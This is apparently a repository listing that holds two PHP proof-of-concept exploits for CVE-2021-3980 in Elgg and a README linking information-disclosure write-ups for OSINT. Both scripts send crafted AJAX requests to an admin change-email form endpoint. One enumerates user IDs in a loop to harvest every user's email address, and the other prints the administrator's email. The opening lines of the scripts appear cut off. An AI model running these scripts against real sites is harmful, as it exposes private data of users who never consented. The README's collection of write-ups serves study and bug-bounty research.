├── CVE-2021-3980-multi.php ├── CVE-2021-3980.php └── README.md /CVE-2021-3980-multi.php: -------------------------------------------------------------------------------- 1 | = 40; $i-- ) { 13 | curl_setopt($ch, CURLOPT_URL, 'http://'.$host.'/elgg/ajax/form/admin/user/change_email?user_guid='.$i); 14 | curl_setopt($ch,CURLOPT_HTTPHEADER,array( 15 | 'X-Requested-With:XMLHttpRequest', 16 | 'X-Elgg-Ajax-API:2' 17 | )); 18 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); 19 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 20 | 21 | $content = curl_exec($ch); 22 | $content = json_decode($content, false); 23 | 24 | $dom = new DOMDocument; 25 | $dom->loadHTML($content->value); 26 | $attr = array(); 27 | $tg = "input"; 28 | $inputs = $dom->getElementsByTagName($tg); 29 | 30 | if(sizeof($inputs) == 4) { 31 | foreach ($inputs as $tag) { 32 | array_push($attr, $tag->getAttribute("value")); 33 | } 34 | echo end($attr) . "\n"; 35 | } 36 | } 37 | 38 | ?> -------------------------------------------------------------------------------- /CVE-2021-3980.php: -------------------------------------------------------------------------------- 1 | loadHTML($content->value); 22 | $attr = array(); 23 | $tg = "input"; 24 | $inputs = $dom->getElementsByTagName($tg); 25 | 26 | foreach ($inputs as $tag) { 27 | array_push($attr, $tag->getAttribute("value")); 28 | } 29 | 30 | echo "The e-mail of the admin is ". end($attr) . " :)\n"; 31 | 32 | ?> -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Information Disclosure Write-Ups And PoCs 2 | 3 | This is the list of write-ups, articles, and PoC of various vulnerabilites (or just flaws) **interesting in context of OSINT** (mostly CWE-200). 4 | 5 | For educational purposes only! By studying this content, you will understand how to find similar vulnerabilities in other systems. 6 | 7 | All write-ups are also archived in [archive.md](https://archive.md/). 8 | 9 | | Name | PoCs | 10 | | ------------- | ------------- | 11 | | [brutecat.com - Leaking the email of any YouTube user for $10,000](https://brutecat.com/articles/leaking-youtube-emails) | | 12 | | [Breno Vitório - Exposure of Private Personal Information to an Unauthorized Actor in elgg/elgg](https://huntr.dev/bounties/1f43f11e-4bd8-451f-a244-dc9541cdc0ac/) | [PoC 1](./CVE-2021-3980.php), [PoC 2](/CVE-2021-3980-multi.php) | 13 | | [Abhishek Pathak - This is how i was able to See and Delete your Private Facebook Portal photos](https://pathleax.medium.com/this-is-how-i-was-able-to-see-and-delete-your-private-facebook-portal-photos-a93ed22f875b) | - | 14 | | [Tom Anthony - Google Exploit – Steal Account Login Email Addresses](https://www.tomanthony.co.uk/blog/google-exploit-steal-login-email-addresses/) | - | 15 | | [mangopdf - When you browse Instagram and find former Australian Prime Minister Tony Abbott's passport number](https://mango.pdf.zone/finding-former-australian-prime-minister-tony-abbotts-passport-number-on-instagram) | - | 16 | | [Mohamed A. Baset - The 2.5mins or 2.5k$ hawk-eye bug - A Facebook Pages Admins Disclosure Vulnerability!](https://seekurity.com/blog/2018/02/25/admin/general/the-2-5mins-or-2-5k-hawk-eye-bug-a-facebook-pages-admins-disclosure-vulnerability) | - | 17 | | [Youssef Sammouda - Expose the email address of Workplace users](https://ysamm.com/?p=588) | - | 18 | | [Dávid Schütz - IDOR on clientauthconfig.googleapis.com](https://feed.bugs.xdavidhu.me/bugs/0009) | - | 19 | | [Dávid Schütz - De-anonymising Anonymous Animals in Google Workspace](https://feed.bugs.xdavidhu.me/bugs/0003) | - | 20 | | [Dávid Schütz - Stealing Your Private YouTube Videos, One Frame at a Time](https://bugs.xdavidhu.me/google/2021/01/11/stealing-your-private-videos-one-frame-at-a-time/) | - | 21 | | [Jerry Shah (Jerry) - Users Information Disclosure - WordPress CMS](https://shahjerry33.medium.com/information-disclosure-wordpress-cms-82133480b8b3), [HackerOne](https://hackerone.com/reports/1735586) | - | 22 | | [th3.d1p4k - Microsoft bug bounty writeup (Plesk-stat)](https://dewangpanchal98.medium.com/microsoft-bug-bounty-writeup-5ee4a7264dbf) | - | 23 | | [Minio Information Disclosure](https://www.pingsafe.com/blog/cve-2023-28432-minio-information-disclosure-vulnerability/) | [PoC](https://y4er.com/posts/minio-cve-2023-28432/) | 24 | | [Nextcloud Information Disclosure](https://hackerone.com/reports/1690510) | - | 25 | | [CVE-2020-9043 (WordPress)](https://nvd.nist.gov/vuln/detail/CVE-2020-9043) | - | 26 | | [CVE-2021-24917 (WordPress)](https://nvd.nist.gov/vuln/detail/CVE-2021-24917) | - | 27 | | [CVE-2022-2379 (WordPress)](https://nvd.nist.gov/vuln/detail/CVE-2022-2379) | - | 28 | | [CVE-2022-2462 (WordPress)](https://nvd.nist.gov/vuln/detail/CVE-2022-2462) | - | 29 | | [CVE-2022-2034 (WordPress)](https://nvd.nist.gov/vuln/detail/CVE-2022-2034), [HackerOne](https://hackerone.com/reports/1590237) | - | 30 | | [CVE-2022-1442 (WordPress)](https://nvd.nist.gov/vuln/detail/CVE-2022-1442) | [PoC](https://gist.github.com/Xib3rR4dAr/6e6c6e5fa1f8818058c7f03de1eda6bf) | 31 | --------------------------------------------------------------------------------